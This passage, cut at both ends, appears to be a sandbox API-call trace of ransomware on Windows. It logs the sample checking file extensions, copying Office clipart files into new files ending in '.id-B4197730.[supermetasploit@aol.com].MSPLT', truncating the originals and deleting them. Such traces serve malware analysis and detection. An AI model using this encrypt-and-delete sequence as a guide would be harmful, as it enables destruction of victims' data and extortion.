(lpString1=".1cd", lpString2=".WMF") returned -1 [0292.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0292.350] lstrlenW (lpString=".jpg") returned 4 [0292.350] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0292.350] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0292.350] lstrlenW (lpString="AN01173_.WMF") returned 12 [0292.350] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0292.352] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=26332) returned 1 [0292.352] CloseHandle (hObject=0x440) returned 1 [0292.352] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf")) returned 0x220 [0292.352] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.352] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0292.352] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.353] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.353] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0292.353] GetLastError () returned 0x0 [0292.353] ReadFile (in: hFile=0x440, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x66dc, lpOverlapped=0x0) returned 1 [0292.356] WriteFile (in: hFile=0x450, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x66e0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x66e0, lpOverlapped=0x0) returned 1 [0292.358] ReadFile (in: hFile=0x440, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0292.358] WriteFile (in: hFile=0x450, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0292.358] SetEndOfFile (hFile=0x450) returned 1 [0292.358] CloseHandle (hObject=0x450) returned 1 [0292.364] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.364] SetEndOfFile (hFile=0x440) returned 1 [0292.368] CloseHandle (hObject=0x440) returned 1 [0292.368] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0292.369] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf")) returned 1 [0292.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0292.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0292.370] lstrlenW (lpString=".doc") returned 4 [0292.370] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0292.370] lstrlenW (lpString=".docx") returned 5 [0292.370] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0292.370] lstrlenW (lpString=".pdf") returned 4 [0292.370] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0292.370] lstrlenW (lpString=".xls") returned 4 [0292.370] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0292.370] lstrlenW (lpString=".xlsx") returned 5 [0292.370] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0292.370] lstrlenW (lpString=".ppt") returned 4 [0292.370] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0292.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0292.370] lstrlenW (lpString=".zip") returned 4 [0292.370] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0292.370] lstrlenW (lpString=".rar") returned 4 [0292.370] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0292.370] lstrlenW (lpString=".bz2") returned 4 [0292.370] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0292.371] lstrlenW (lpString=".7z") returned 3 [0292.371] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0292.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0292.371] lstrlenW (lpString=".dbf") returned 4 [0292.371] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0292.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0292.371] lstrlenW (lpString=".1cd") returned 4 [0292.371] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0292.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0292.371] lstrlenW (lpString=".jpg") returned 4 [0292.371] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0292.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0292.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0292.371] lstrlenW (lpString=".doc") returned 4 [0292.371] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0292.371] lstrlenW (lpString=".docx") returned 5 [0292.371] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0292.371] lstrlenW (lpString=".pdf") returned 4 [0292.371] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0292.371] lstrlenW (lpString=".xls") returned 4 [0292.371] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0292.371] lstrlenW (lpString=".xlsx") returned 5 [0292.371] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0292.371] lstrlenW (lpString=".ppt") returned 4 [0292.371] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0292.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0292.371] lstrlenW (lpString=".zip") returned 4 [0292.372] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0292.372] lstrlenW (lpString=".rar") returned 4 [0292.372] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0292.372] lstrlenW (lpString=".bz2") returned 4 [0292.372] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0292.372] lstrlenW (lpString=".7z") returned 3 [0292.372] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0292.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0292.372] lstrlenW (lpString=".dbf") returned 4 [0292.372] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0292.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0292.372] lstrlenW (lpString=".1cd") returned 4 [0292.372] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0292.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0292.372] lstrlenW (lpString=".jpg") returned 4 [0292.372] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0292.372] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0292.372] lstrlenW (lpString="AN01174_.WMF") returned 12 [0292.372] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0292.373] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=27858) returned 1 [0292.373] CloseHandle (hObject=0x440) returned 1 [0292.373] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf")) returned 0x220 [0292.373] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.374] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0292.374] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.374] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.374] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0292.548] GetLastError () returned 0x0 [0292.548] ReadFile (in: hFile=0x440, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x6cd2, lpOverlapped=0x0) returned 1 [0292.646] WriteFile (in: hFile=0x474, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x6ce0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x6ce0, lpOverlapped=0x0) returned 1 [0292.648] ReadFile (in: hFile=0x440, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0292.648] WriteFile (in: hFile=0x474, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0292.648] SetEndOfFile (hFile=0x474) returned 1 [0292.649] CloseHandle (hObject=0x474) returned 1 [0292.652] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.652] SetEndOfFile (hFile=0x440) returned 1 [0292.657] CloseHandle (hObject=0x440) returned 1 [0292.657] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0292.658] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf")) returned 1 [0292.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0292.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0292.659] lstrlenW (lpString=".doc") returned 4 [0292.659] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0292.659] lstrlenW (lpString=".docx") returned 5 [0292.659] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0292.659] lstrlenW (lpString=".pdf") returned 4 [0292.659] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0292.659] lstrlenW (lpString=".xls") returned 4 [0292.659] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0292.659] lstrlenW (lpString=".xlsx") returned 5 [0292.659] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0292.659] lstrlenW (lpString=".ppt") returned 4 [0292.659] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0292.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0292.659] lstrlenW (lpString=".zip") returned 4 [0292.659] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0292.659] lstrlenW (lpString=".rar") returned 4 [0292.659] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0292.659] lstrlenW (lpString=".bz2") returned 4 [0292.659] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0292.659] lstrlenW (lpString=".7z") returned 3 [0292.659] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0292.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0292.659] lstrlenW (lpString=".dbf") returned 4 [0292.659] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0292.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0292.660] lstrlenW (lpString=".1cd") returned 4 [0292.660] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0292.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0292.660] lstrlenW (lpString=".jpg") returned 4 [0292.660] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0292.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0292.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0292.660] lstrlenW (lpString=".doc") returned 4 [0292.660] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0292.660] lstrlenW (lpString=".docx") returned 5 [0292.660] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0292.660] lstrlenW (lpString=".pdf") returned 4 [0292.660] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0292.660] lstrlenW (lpString=".xls") returned 4 [0292.660] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0292.660] lstrlenW (lpString=".xlsx") returned 5 [0292.660] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0292.660] lstrlenW (lpString=".ppt") returned 4 [0292.660] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0292.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0292.660] lstrlenW (lpString=".zip") returned 4 [0292.660] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0292.660] lstrlenW (lpString=".rar") returned 4 [0292.660] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0292.660] lstrlenW (lpString=".bz2") returned 4 [0292.661] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0292.661] lstrlenW (lpString=".7z") returned 3 [0292.661] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0292.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0292.661] lstrlenW (lpString=".dbf") returned 4 [0292.661] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0292.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0292.661] lstrlenW (lpString=".1cd") returned 4 [0292.661] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0292.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0292.661] lstrlenW (lpString=".jpg") returned 4 [0292.661] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0292.661] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0292.661] lstrlenW (lpString="AN01216_.WMF") returned 12 [0292.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01216_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0292.662] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=5836) returned 1 [0292.662] CloseHandle (hObject=0x440) returned 1 [0292.662] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01216_.wmf")) returned 0x220 [0292.662] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01216_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01216_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0292.663] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.663] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01216_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0292.664] GetLastError () returned 0x0 [0292.664] ReadFile (in: hFile=0x440, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x16cc, lpOverlapped=0x0) returned 1 [0292.699] WriteFile (in: hFile=0x474, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x16d0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x16d0, lpOverlapped=0x0) returned 1 [0292.703] ReadFile (in: hFile=0x440, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0292.703] WriteFile (in: hFile=0x474, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0292.703] SetEndOfFile (hFile=0x474) returned 1 [0292.884] CloseHandle (hObject=0x474) returned 1 [0293.193] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.193] SetEndOfFile (hFile=0x440) returned 1 [0293.198] CloseHandle (hObject=0x440) returned 1 [0293.199] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0293.224] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01216_.wmf")) returned 1 [0293.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 68 [0293.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 68 [0293.225] lstrlenW (lpString=".doc") returned 4 [0293.225] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0293.225] lstrlenW (lpString=".docx") returned 5 [0293.225] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0293.225] lstrlenW (lpString=".pdf") returned 4 [0293.225] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0293.225] lstrlenW (lpString=".xls") returned 4 [0293.225] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0293.225] lstrlenW (lpString=".xlsx") returned 5 [0293.225] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0293.225] lstrlenW (lpString=".ppt") returned 4 [0293.225] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0293.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 68 [0293.225] lstrlenW (lpString=".zip") returned 4 [0293.225] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0293.226] lstrlenW (lpString=".rar") returned 4 [0293.226] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0293.226] lstrlenW (lpString=".bz2") returned 4 [0293.226] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0293.226] lstrlenW (lpString=".7z") returned 3 [0293.226] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0293.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 68 [0293.226] lstrlenW (lpString=".dbf") returned 4 [0293.226] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0293.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 68 [0293.226] lstrlenW (lpString=".1cd") returned 4 [0293.226] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0293.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 68 [0293.226] lstrlenW (lpString=".jpg") returned 4 [0293.226] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0293.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 68 [0293.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 68 [0293.226] lstrlenW (lpString=".doc") returned 4 [0293.226] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0293.226] lstrlenW (lpString=".docx") returned 5 [0293.226] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0293.226] lstrlenW (lpString=".pdf") returned 4 [0293.226] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0293.226] lstrlenW (lpString=".xls") returned 4 [0293.226] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0293.227] lstrlenW (lpString=".xlsx") returned 5 [0293.227] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0293.227] lstrlenW (lpString=".ppt") returned 4 [0293.227] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0293.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 68 [0293.227] lstrlenW (lpString=".zip") returned 4 [0293.227] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0293.227] lstrlenW (lpString=".rar") returned 4 [0293.227] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0293.227] lstrlenW (lpString=".bz2") returned 4 [0293.227] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0293.227] lstrlenW (lpString=".7z") returned 3 [0293.227] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0293.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 68 [0293.227] lstrlenW (lpString=".dbf") returned 4 [0293.227] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0293.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 68 [0293.227] lstrlenW (lpString=".1cd") returned 4 [0293.227] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0293.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 68 [0293.227] lstrlenW (lpString=".jpg") returned 4 [0293.227] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0293.227] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0293.228] lstrlenW 